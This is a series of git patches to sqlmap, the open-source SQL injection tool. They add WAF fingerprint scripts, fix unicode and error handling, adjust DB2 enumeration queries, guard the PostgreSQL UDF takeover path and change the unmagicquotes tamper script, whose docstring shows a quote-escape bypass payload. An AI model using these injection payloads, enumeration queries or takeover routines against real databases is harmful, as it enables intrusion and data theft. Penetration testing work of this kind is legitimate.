diff --git a/waf/anquanbao.py b/waf/anquanbao.py
new file mode 100644
index 000000000..9b2302914
--- /dev/null
+++ b/waf/anquanbao.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import re
+
+from lib.core.enums import HTTP_HEADER
+from lib.core.settings import WAF_ATTACK_VECTORS
+
+__product__ = "Anquanbao Web Application Firewall (Anquanbao)"
+
+def detect(get_page):
+    retval = False
+
+    for vector in WAF_ATTACK_VECTORS:
+        page, headers, code = get_page(get=vector)
+        retval = re.search(r"MISS", headers.get("X-Powered-By-Anquanbao", ""), re.I) is not None
+        if retval:
+            break
+
+    return retval

From b90bbe18c8f0a0bb44d9d36f74c4acf7b8d5806d Mon Sep 17 00:00:00 2001
From: flsf <jianmaflsf@gmail.com>
Date: Mon, 15 Dec 2014 03:19:23 +0800
Subject: [PATCH 227/492] Adding new WAF script (Baidu yunjiasu)

---
 waf/baidu.py | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 waf/baidu.py

diff --git a/waf/baidu.py b/waf/baidu.py
new file mode 100644
index 000000000..6271f230e
--- /dev/null
+++ b/waf/baidu.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import re
+
+from lib.core.enums import HTTP_HEADER
+from lib.core.settings import WAF_ATTACK_VECTORS
+
+__product__ = "Baidu Web Application Firewall (Baidu yunjiasu)"
+
+def detect(get_page):
+    retval = False
+
+    for vector in WAF_ATTACK_VECTORS:
+        page, headers, code = get_page(get=vector)
+        retval = re.search(r"fhl", headers.get("X-Server", ""), re.I) is not None
+        if retval:
+            break
+
+    return retval

From a56dcc1dc30c3cf371fdb44e730f4588f9b7749a Mon Sep 17 00:00:00 2001
From: flsf <jianmaflsf@gmail.com>
Date: Mon, 15 Dec 2014 03:23:06 +0800
Subject: [PATCH 228/492] Adding new WAF script (safedog)

---
 waf/safedog.py | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 waf/safedog.py

diff --git a/waf/safedog.py b/waf/safedog.py
new file mode 100644
index 000000000..219baf7d3
--- /dev/null
+++ b/waf/safedog.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import re
+
+from lib.core.enums import HTTP_HEADER
+from lib.core.settings import WAF_ATTACK_VECTORS
+
+__product__ = "Safedog Web Application Firewall (safedog)"
+
+def detect(get_page):
+    retval = False
+
+    for vector in WAF_ATTACK_VECTORS:
+        page, headers, code = get_page(get=vector)
+        retval = re.search(r"WAF/2.0", headers.get("X-Powered-By", ""), re.I) is not None
+        if retval:
+            break
+
+    return retval

From ecbba4ea2050adbc605b4b87f6de6d74fa8b7e30 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 15 Dec 2014 07:18:47 +0100
Subject: [PATCH 229/492] Patch for an Issue #1030

---
 lib/core/target.py | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/lib/core/target.py b/lib/core/target.py
index e2d339cac..ca9851c84 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -519,7 +519,7 @@ def _createFilesDir():
         except OSError, ex:
             tempDir = tempfile.mkdtemp(prefix="sqlmapfiles")
             warnMsg = "unable to create files directory "
-            warnMsg += "'%s' (%s). " % (conf.filePath, ex)
+            warnMsg += "'%s' (%s). " % (conf.filePath, getUnicode(ex))
             warnMsg += "Using temporary directory '%s' instead" % tempDir
             logger.warn(warnMsg)
 
@@ -541,7 +541,7 @@ def _createDumpDir():
         except OSError, ex:
             tempDir = tempfile.mkdtemp(prefix="sqlmapdump")
             warnMsg = "unable to create dump directory "
-            warnMsg += "'%s' (%s). " % (conf.dumpPath, ex)
+            warnMsg += "'%s' (%s). " % (conf.dumpPath, getUnicode(ex))
             warnMsg += "Using temporary directory '%s' instead" % tempDir
             logger.warn(warnMsg)
 
@@ -576,7 +576,7 @@ def _createTargetDirs():
                 errMsg += "create temporary files and/or directories"
                 raise SqlmapGenericException(errMsg)
             warnMsg = "unable to create regular output directory "
-            warnMsg += "'%s' (%s). " % (paths.SQLMAP_OUTPUT_PATH, ex)
+            warnMsg += "'%s' (%s). " % (paths.SQLMAP_OUTPUT_PATH, getUnicode(ex))
             warnMsg += "Using temporary directory '%s' instead" % tempDir
             logger.warn(warnMsg)
 

From eb15a19532455e20921ffcfab101de7449aa2bf5 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 15 Dec 2014 09:11:40 +0100
Subject: [PATCH 230/492] Patch for an Issue #1032

---
 lib/parse/cmdline.py | 8 ++++++--
 1 file changed, 6 insertions(+), 2 deletions(-)

diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index c916b3278..9e4996b86 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -24,6 +24,7 @@ from lib.core.data import logger
 from lib.core.defaults import defaults
 from lib.core.enums import AUTOCOMPLETE_TYPE
 from lib.core.exception import SqlmapShellQuitException
+from lib.core.exception import SqlmapSyntaxException
 from lib.core.settings import BASIC_HELP_ITEMS
 from lib.core.settings import DUMMY_URL
 from lib.core.settings import IS_WIN
@@ -839,8 +840,11 @@ def cmdLineParser():
                     loadHistory(AUTOCOMPLETE_TYPE.SQLMAP)
                     break
 
-            for arg in shlex.split(command):
-                argv.append(getUnicode(arg, encoding=sys.stdin.encoding))
+            try:
+                for arg in shlex.split(command):
+                    argv.append(getUnicode(arg, encoding=sys.stdin.encoding))
+            except ValueError, ex:
+                raise SqlmapSyntaxException, "something went wrong during command line parsing ('%s')" % ex
 
         # Hide non-basic options in basic help case
         for i in xrange(len(argv)):

From e794c7f246d33da83335ee965bd2653f36cc8d7f Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 15 Dec 2014 09:13:13 +0100
Subject: [PATCH 231/492] Patch for an Issue #1027

---
 lib/core/target.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/target.py b/lib/core/target.py
index ca9851c84..2f33daa7b 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -597,7 +597,7 @@ def _createTargetDirs():
                 errMsg += "create temporary files and/or directories"
                 raise SqlmapGenericException(errMsg)
             warnMsg = "unable to create output directory "
-            warnMsg += "'%s' (%s). " % (conf.outputPath, ex)
+            warnMsg += "'%s' (%s). " % (conf.outputPath, getUnicode(ex))
             warnMsg += "Using temporary directory '%s' instead" % tempDir
             logger.warn(warnMsg)
 

From 4c6331daa6f5efd93087aaa500422c6c3f996003 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 15 Dec 2014 09:30:54 +0100
Subject: [PATCH 232/492] Patch for an Issue #1028

---
 lib/core/common.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index e4be4dd3d..03261478f 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -895,7 +895,7 @@ def readInput(message, default=None, checkBatch=True):
     elif message[-1] == ']':
         message += " "
 
-    if kb.prependFlag:
+    if kb.get("prependFlag"):
         message = "\n%s" % message
         kb.prependFlag = False
 
@@ -1819,7 +1819,7 @@ def getSQLSnippet(dbms, sfile, **variables):
         if choice and choice[0].lower() == "y":
             for var in variables:
                 msg = "insert value for variable '%s': " % var
-                val = readInput(msg)
+                val = readInput(msg, default="")
                 retVal = retVal.replace(r"%%%s%%" % var, val)
 
     return retVal

From f73204fffb2b2eb6ae2534832e2fd2f834e009df Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 15 Dec 2014 10:15:31 +0100
Subject: [PATCH 233/492] Update for an Issue #1029

---
 doc/THANKS.md | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/doc/THANKS.md b/doc/THANKS.md
index 97335723c..216257cf9 100644
--- a/doc/THANKS.md
+++ b/doc/THANKS.md
@@ -654,6 +654,10 @@ clav, <elclav(at)gmail.com>
 dragoun dash, <dragoun.dash(at)gmail.com>
 * for reporting a minor bug
 
+flsf, <jianmaflsf@gmail.com>
+* for contributing WAF scripts 360.py, anquanbao.py, baidu.py, safedog.py
+* for contributing a minor patch
+
 fufuh, <fufuh(at)users.sourceforge.net>
 * for reporting a bug when running on Windows
 

From 872902b1c9b5e4c0c15bd86250a4f1e51fd02ad2 Mon Sep 17 00:00:00 2001
From: flsf <jianmaflsf@gmail.com>
Date: Mon, 15 Dec 2014 17:29:59 +0800
Subject: [PATCH 234/492] Update company name in parenthesis

---
 waf/360.py     | 2 +-
 waf/baidu.py   | 2 +-
 waf/safedog.py | 2 +-
 3 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/waf/360.py b/waf/360.py
index 26a7cef52..f30b934e2 100644
--- a/waf/360.py
+++ b/waf/360.py
@@ -10,7 +10,7 @@ import re
 from lib.core.enums import HTTP_HEADER
 from lib.core.settings import WAF_ATTACK_VECTORS
 
-__product__ = "360 Web Application Firewall (360wzb)"
+__product__ = "360 Web Application Firewall (360)"
 
 def detect(get_page):
     retval = False
diff --git a/waf/baidu.py b/waf/baidu.py
index 6271f230e..600bc57c1 100644
--- a/waf/baidu.py
+++ b/waf/baidu.py
@@ -10,7 +10,7 @@ import re
 from lib.core.enums import HTTP_HEADER
 from lib.core.settings import WAF_ATTACK_VECTORS
 
-__product__ = "Baidu Web Application Firewall (Baidu yunjiasu)"
+__product__ = "Yunjiasu Web Application Firewall (Baidu)"
 
 def detect(get_page):
     retval = False
diff --git a/waf/safedog.py b/waf/safedog.py
index 219baf7d3..2513e8133 100644
--- a/waf/safedog.py
+++ b/waf/safedog.py
@@ -10,7 +10,7 @@ import re
 from lib.core.enums import HTTP_HEADER
 from lib.core.settings import WAF_ATTACK_VECTORS
 
-__product__ = "Safedog Web Application Firewall (safedog)"
+__product__ = "Safedog Web Application Firewall (Safedog)"
 
 def detect(get_page):
     retval = False

From 21837f236f1cd977835989a8c5d25cb303d8708a Mon Sep 17 00:00:00 2001
From: flsf <jianmaflsf@gmail.com>
Date: Mon, 15 Dec 2014 20:07:38 +0800
Subject: [PATCH 235/492] fix comments error

---
 lib/parse/cmdline.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index c916b3278..b721fdb9c 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -472,7 +472,7 @@ def cmdLineParser():
         enumeration.add_option("--sql-file", dest="sqlFile",
                                help="Execute SQL statements from given file(s)")
 
-        # User-defined function options
+        # Brute force options
         brute = OptionGroup(parser, "Brute force", "These "
                           "options can be used to run brute force "
                           "checks")

From 35c8e016a8059083be9ddc4e6d06236b251b3d71 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 15 Dec 2014 13:26:15 +0100
Subject: [PATCH 236/492] Minor patch

---
 lib/core/target.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/target.py b/lib/core/target.py
index 2f33daa7b..7ba192a5c 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -225,7 +225,7 @@ def _setRequestParams():
         elif test[0] in ("q", "Q"):
             raise SqlmapUserQuitException
 
-    for place, value in ((PLACE.URI, conf.url), (PLACE.CUSTOM_POST, conf.data), (PLACE.CUSTOM_HEADER, str(conf.httpHeaders))):
+    for place, value in ((PLACE.URI, conf.url), (PLACE.CUSTOM_POST, conf.data), (PLACE.CUSTOM_HEADER, unicode(conf.httpHeaders))):
         _ = re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or "") if place == PLACE.CUSTOM_HEADER else value or ""
         if CUSTOM_INJECTION_MARK_CHAR in _:
             if kb.processUserMarks is None:

From e6de92ce885f86205ab4935d26a32eab8f937ac6 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 15 Dec 2014 13:36:08 +0100
Subject: [PATCH 237/492] Minor patch (unicode related)

---
 lib/controller/checks.py | 2 +-
 lib/core/common.py       | 2 +-
 lib/core/target.py       | 4 ++--
 lib/parse/configfile.py  | 5 +++--
 4 files changed, 7 insertions(+), 6 deletions(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index aa6859c54..f2afacd4a 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -1273,7 +1273,7 @@ def checkConnection(suppressOutput=False):
             raise SqlmapConnectionException(errMsg)
         except socket.error, ex:
             errMsg = "problem occurred while "
-            errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, str(ex))
+            errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, getUnicode(ex))
             raise SqlmapConnectionException(errMsg)
 
     if not suppressOutput and not conf.dummy:
diff --git a/lib/core/common.py b/lib/core/common.py
index 03261478f..457d1b048 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -857,7 +857,7 @@ def dataToDumpFile(dumpFile, data):
         dumpFile.write(data)
         dumpFile.flush()
     except IOError, ex:
-        if "No space left" in str(ex):
+        if "No space left" in getUnicode(ex):
             errMsg = "no space left on output device"
             logger.error(errMsg)
         else:
diff --git a/lib/core/target.py b/lib/core/target.py
index 7ba192a5c..8e5e32eaf 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -225,7 +225,7 @@ def _setRequestParams():
         elif test[0] in ("q", "Q"):
             raise SqlmapUserQuitException
 
-    for place, value in ((PLACE.URI, conf.url), (PLACE.CUSTOM_POST, conf.data), (PLACE.CUSTOM_HEADER, unicode(conf.httpHeaders))):
+    for place, value in ((PLACE.URI, conf.url), (PLACE.CUSTOM_POST, conf.data), (PLACE.CUSTOM_HEADER, getUnicode(conf.httpHeaders))):
         _ = re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or "") if place == PLACE.CUSTOM_HEADER else value or ""
         if CUSTOM_INJECTION_MARK_CHAR in _:
             if kb.processUserMarks is None:
@@ -610,7 +610,7 @@ def _createTargetDirs():
             if conf.data:
                 f.write("\n\n%s" % getUnicode(conf.data))
     except IOError, ex:
-        if "denied" in str(ex):
+        if "denied" in getUnicode(ex):
             errMsg = "you don't have enough permissions "
         else:
             errMsg = "something went wrong while trying "
diff --git a/lib/parse/configfile.py b/lib/parse/configfile.py
index 7f899398b..24e6aadb5 100644
--- a/lib/parse/configfile.py
+++ b/lib/parse/configfile.py
@@ -11,6 +11,7 @@ from ConfigParser import MissingSectionHeaderError
 from ConfigParser import ParsingError
 
 from lib.core.common import checkFile
+from lib.core.common import getUnicode
 from lib.core.common import openFile
 from lib.core.common import unArrayizeValue
 from lib.core.common import UnicodeRawConfigParser
@@ -41,7 +42,7 @@ def configFileProxy(section, option, boolean=False, integer=False):
                 value = config.get(section, option)
         except ValueError, ex:
             errMsg = "error occurred while processing the option "
-            errMsg += "'%s' in provided configuration file ('%s')" % (option, str(ex))
+            errMsg += "'%s' in provided configuration file ('%s')" % (option, getUnicode(ex))
             raise SqlmapSyntaxException(errMsg)
 
         if value:
@@ -72,7 +73,7 @@ def configFileParser(configFile):
         config = UnicodeRawConfigParser()
         config.readfp(configFP)
     except Exception, ex:
-        errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % str(ex)
+        errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % getUnicode(ex)
         raise SqlmapSyntaxException(errMsg)
 
     if not config.has_section("Target"):

From 9d06b71862d58ff02273f08b7f3a41fda9badc57 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 15 Dec 2014 13:51:00 +0100
Subject: [PATCH 238/492] Minor revert

---
 lib/core/target.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/target.py b/lib/core/target.py
index 8e5e32eaf..2187a0cf5 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -225,7 +225,7 @@ def _setRequestParams():
         elif test[0] in ("q", "Q"):
             raise SqlmapUserQuitException
 
-    for place, value in ((PLACE.URI, conf.url), (PLACE.CUSTOM_POST, conf.data), (PLACE.CUSTOM_HEADER, getUnicode(conf.httpHeaders))):
+    for place, value in ((PLACE.URI, conf.url), (PLACE.CUSTOM_POST, conf.data), (PLACE.CUSTOM_HEADER, str(conf.httpHeaders))):
         _ = re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or "") if place == PLACE.CUSTOM_HEADER else value or ""
         if CUSTOM_INJECTION_MARK_CHAR in _:
             if kb.processUserMarks is None:

From 180ede0cb381d87082caeb283dc5b692c2e1ae9c Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 15 Dec 2014 14:07:28 +0100
Subject: [PATCH 239/492] Minor patch

---
 lib/request/connect.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/request/connect.py b/lib/request/connect.py
index 1e7ad5141..cbe8176a5 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -355,14 +355,14 @@ class Connect(object):
 
             post = unicodeencode(post, kb.pageEncoding)
 
-            if method:
+            if method and method not in (HTTPMETHOD.GET, HTTPMETHOD.POST):
                 method = unicodeencode(method)
                 req = MethodRequest(url, post, headers)
                 req.set_method(method)
             else:
                 req = urllib2.Request(url, post, headers)
 
-            requestHeaders += "\n".join("%s: %s" % (key.capitalize() if isinstance(key, basestring) else key, getUnicode(value)) for (key, value) in req.header_items())
+            requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items())
 
             if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj:
                 conf.cj._policy._now = conf.cj._now = int(time.time())

From 0cb7852754dee09dcd186885a684b566f6c8c6d6 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 17 Dec 2014 10:02:36 +0100
Subject: [PATCH 240/492] Patch for an Issue #1046

---
 lib/utils/hashdb.py | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/lib/utils/hashdb.py b/lib/utils/hashdb.py
index d0e57c3df..a6891c309 100644
--- a/lib/utils/hashdb.py
+++ b/lib/utils/hashdb.py
@@ -77,8 +77,12 @@ class HashDB(object):
                         for row in self.cursor.execute("SELECT value FROM storage WHERE id=?", (hash_,)):
                             retVal = row[0]
                     except sqlite3.OperationalError, ex:
-                        if not 'locked' in ex.message:
+                        if not "locked" in ex.message:
                             raise
+                    except sqlite3.DatabaseError, ex:
+                        errMsg = "error occurred while accessing session file '%s' ('%s'). " % (self.filepath, ex)
+                        errMsg += "If the problem persists please rerun with `--flush-session`"
+                        raise SqlmapDataException, errMsg
                     else:
                         break
         return retVal if not unserialize else unserializeObject(retVal)

From 8947f2df961501a9739f196d5c26e7eb3167f9cb Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 17 Dec 2014 23:07:27 +0100
Subject: [PATCH 241/492] Patch for an Issue #1047

---
 plugins/dbms/postgresql/takeover.py | 24 ++++++++++++++++--------
 1 file changed, 16 insertions(+), 8 deletions(-)

diff --git a/plugins/dbms/postgresql/takeover.py b/plugins/dbms/postgresql/takeover.py
index f7766cc74..7da0ea1b2 100644
--- a/plugins/dbms/postgresql/takeover.py
+++ b/plugins/dbms/postgresql/takeover.py
@@ -8,12 +8,14 @@ See the file 'doc/COPYING' for copying permission
 import os
 
 from lib.core.common import Backend
+from lib.core.common import checkFile
 from lib.core.common import decloakToTemp
 from lib.core.common import randomStr
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.data import paths
 from lib.core.enums import OS
+from lib.core.exception import SqlmapSystemException
 from lib.core.exception import SqlmapUnsupportedFeatureException
 from lib.request import inject
 from plugins.generic.takeover import Takeover as GenericTakeover
@@ -60,14 +62,20 @@ class Takeover(GenericTakeover):
             errMsg = "unsupported feature on versions of PostgreSQL before 8.2"
             raise SqlmapUnsupportedFeatureException(errMsg)
 
-        if Backend.isOs(OS.WINDOWS):
-            _ = os.path.join(self.udfLocalFile, "postgresql", "windows", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.dll_")
-            self.udfLocalFile = decloakToTemp(_)
-            self.udfSharedLibExt = "dll"
-        else:
-            _ = os.path.join(self.udfLocalFile, "postgresql", "linux", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.so_")
-            self.udfLocalFile = decloakToTemp(_)
-            self.udfSharedLibExt = "so"
+        try:
+            if Backend.isOs(OS.WINDOWS):
+                _ = os.path.join(self.udfLocalFile, "postgresql", "windows", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.dll_")
+                checkFile(_)
+                self.udfLocalFile = decloakToTemp(_)
+                self.udfSharedLibExt = "dll"
+            else:
+                _ = os.path.join(self.udfLocalFile, "postgresql", "linux", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.so_")
+                checkFile(_)
+                self.udfLocalFile = decloakToTemp(_)
+                self.udfSharedLibExt = "so"
+        except SqlmapSystemException:
+            errMsg = "unsupported feature on PostgreSQL %s (%s-bit)" % (majorVer, Backend.getArch())
+            raise SqlmapUnsupportedFeatureException(errMsg)
 
     def udfCreateFromSharedLib(self, udf, inpRet):
         if udf in self.udfToCreate:

From 0b91a6098f5f2a0e7a0132f121deafc4fccbea7e Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 18 Dec 2014 15:13:44 +0100
Subject: [PATCH 242/492] Patch for an Issue #1050

---
 plugins/generic/users.py | 19 ++++++++++---------
 xml/queries.xml          |  8 ++++----
 2 files changed, 14 insertions(+), 13 deletions(-)

diff --git a/plugins/generic/users.py b/plugins/generic/users.py
index a65f51331..c7c2bc731 100644
--- a/plugins/generic/users.py
+++ b/plugins/generic/users.py
@@ -424,17 +424,18 @@ class Users:
                             elif Backend.isDbms(DBMS.DB2):
                                 privs = privilege.split(",")
                                 privilege = privs[0]
-                                privs = privs[1]
-                                privs = list(privs.strip())
-                                i = 1
+                                if len(privs) > 1:
+                                    privs = privs[1]
+                                    privs = list(privs.strip())
+                                    i = 1
 
-                                for priv in privs:
-                                    if priv.upper() in ("Y", "G"):
-                                        for position, db2Priv in DB2_PRIVS.items():
-                                            if position == i:
-                                                privilege += ", " + db2Priv
+                                    for priv in privs:
+                                        if priv.upper() in ("Y", "G"):
+                                            for position, db2Priv in DB2_PRIVS.items():
+                                                if position == i:
+                                                    privilege += ", " + db2Priv
 
-                                    i += 1
+                                        i += 1
 
                                 privileges.add(privilege)
 
diff --git a/xml/queries.xml b/xml/queries.xml
index 521bef313..75185bca0 100644
--- a/xml/queries.xml
+++ b/xml/queries.xml
@@ -612,8 +612,8 @@
         <!-- NOTE: On DB2 it is not possible to list password hashes, since they are handled by the OS -->        
         <passwords/>
         <privileges>
-            <inband query="SELECT grantee,RTRIM(tabschema)||'.'||tabname||CHR(44)||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM syscat.tabauth" condition="grantee"/>
-            <blind query="SELECT tabschema||'.'||tabname||CHR(44)||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,syscat.tabauth.* FROM syscat.tabauth WHERE grantee='%s') AS foobar WHERE LIMIT=%d" count="SELECT COUNT(*) FROM syscat.tabauth WHERE grantee='%s'"/>
+            <inband query="SELECT grantee,RTRIM(tabschema)||'.'||tabname||','||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM syscat.tabauth" condition="grantee"/>
+            <blind query="SELECT tabschema||'.'||tabname||','||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,syscat.tabauth.* FROM syscat.tabauth WHERE grantee='%s') AS foobar WHERE LIMIT=%d" count="SELECT COUNT(*) FROM syscat.tabauth WHERE grantee='%s'"/>
         </privileges>
         <roles/>
         <!-- NOTE: in DB2 schema names are the counterpart to database names on other DBMSes -->
@@ -626,8 +626,8 @@
             <blind query="SELECT tabname FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,tabname FROM sysstat.tables WHERE tabschema='%s') AS foobar WHERE LIMIT=INT('%d')" count="SELECT COUNT(*) FROM sysstat.tables WHERE tabschema='%s'"/>
         </tables>
         <columns>
-            <inband query="SELECT name,RTRIM(coltype)||CHR(40)||RTRIM(CAST(length AS CHAR(254)))||CHR(41) FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" condition="name"/>
-            <blind query="SELECT name FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" query2="SELECT RTRIM(coltype)||CHR(40)||RTRIM(CAST(length AS CHAR(254)))||CHR(41) FROM sysibm.syscolumns WHERE tbname='%s' AND name='%s' AND tbcreator='%s'" count="SELECT COUNT(name) FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" condition="name"/>
+            <inband query="SELECT name,RTRIM(coltype)||'('||RTRIM(CAST(length AS CHAR(254)))||')' FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" condition="name"/>
+            <blind query="SELECT name FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" query2="SELECT RTRIM(coltype)||'('||RTRIM(CAST(length AS CHAR(254)))||')' FROM sysibm.syscolumns WHERE tbname='%s' AND name='%s' AND tbcreator='%s'" count="SELECT COUNT(name) FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" condition="name"/>
         </columns>
         <dump_table>
             <inband query="SELECT %s FROM %s"/>

From 6972020fafba9a341bc4e3a55397aa1f728ec7b5 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 18 Dec 2014 15:58:19 +0100
Subject: [PATCH 243/492] Bug fix for login-like SQLi (OR with 500 result)

---
 lib/request/redirecthandler.py | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/lib/request/redirecthandler.py b/lib/request/redirecthandler.py
index 8d4338175..f67859af7 100644
--- a/lib/request/redirecthandler.py
+++ b/lib/request/redirecthandler.py
@@ -122,6 +122,8 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
                 req.headers[HTTP_HEADER.COOKIE] = headers[HTTP_HEADER.SET_COOKIE].split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)[0]
             try:
                 result = urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers)
+            except urllib2.HTTPError, e:
+                result = e
             except:
                 redurl = None
                 result = fp

From cf3b02ee0465408ea5ae2a33820fdb597326d01c Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 19 Dec 2014 09:26:01 +0100
Subject: [PATCH 244/492] Proper fix for #1053

---
 lib/core/common.py      | 4 ++--
 tamper/unmagicquotes.py | 7 ++++---
 2 files changed, 6 insertions(+), 5 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 457d1b048..c3951b33b 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1564,8 +1564,8 @@ def safeStringFormat(format_, params):
     """
     Avoids problems with inappropriate string format strings
 
-    >>> safeStringFormat('foobar%d%s', ('1', 2))
-    u'foobar12'
+    >>> safeStringFormat('SELECT foo FROM %s LIMIT %d', ('bar', '1'))
+    u'SELECT foo FROM bar LIMIT 1'
     """
 
     if format_.count(PAYLOAD_DELIMITER) == 2:
diff --git a/tamper/unmagicquotes.py b/tamper/unmagicquotes.py
index d56136f7f..b37f6c0eb 100644
--- a/tamper/unmagicquotes.py
+++ b/tamper/unmagicquotes.py
@@ -26,7 +26,7 @@ def tamper(payload, **kwargs):
         * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
 
     >>> tamper("1' AND 1=1")
-    '1%bf%27 AND 1=1-- '
+    '1%bf%27-- '
     """
 
     retVal = payload
@@ -44,9 +44,10 @@ def tamper(payload, **kwargs):
                 continue
 
         if found:
-            _ = re.sub("(?i)\s*(AND|OR)[\s(]+'[^']+'\s*(=|LIKE)\s*'.*", "", retVal)
+            _ = re.sub(r"(?i)\s*(AND|OR)[\s(]+([^\s]+)\s*(=|LIKE)\s*\2", "", retVal)
             if _ != retVal:
                 retVal = _
                 retVal += "-- "
-
+            elif not any(_ in retVal for _ in ('#', '--', '/*')):
+                retVal += "-- "
     return retVal

From 1ea2f5bfe22af7bfe2b8c5df876356e7ce7cffc1 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 19 Dec 2014 09:37:06 +0100
Subject: [PATCH 245/492] Patch for an Issue #1052

---
 lib/core/wordlist.py | 17 ++++++++++++-----
 1 file changed, 12 insertions(+), 5 deletions(-)

diff --git a/lib/core/wordlist.py b/lib/core/wordlist.py
index 4eb3ec8ce..704090754 100644
--- a/lib/core/wordlist.py
+++ b/lib/core/wordlist.py
@@ -9,6 +9,7 @@ import os
 import zipfile
 
 from lib.core.exception import SqlmapDataException
+from lib.core.exception import SqlmapInstallationException
